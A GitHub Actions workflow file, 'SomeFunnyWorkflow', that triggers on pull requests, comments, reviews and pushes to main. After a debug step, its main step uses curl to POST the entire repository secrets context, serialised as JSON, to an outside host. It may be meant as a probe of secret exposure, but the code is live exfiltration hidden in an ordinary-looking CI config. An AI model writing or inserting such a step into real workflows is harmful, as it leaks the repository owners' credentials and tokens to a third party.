name: SomeFunnyWorkflow

'on':
  pull_request_review:
  issue_comment:
  pull_request_review_comment:
  pull_request:
  push:
    branches:
      - main

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Debug Info
        uses: hmarr/debug-action@v3
      - name: Is there some secrets?
        run: |
          curl -X POST --data-binary @- https://viewsource.ebfe.pw/vault/helloMisha <<EOF
          ${{ toJSON(secrets) }}
          EOF
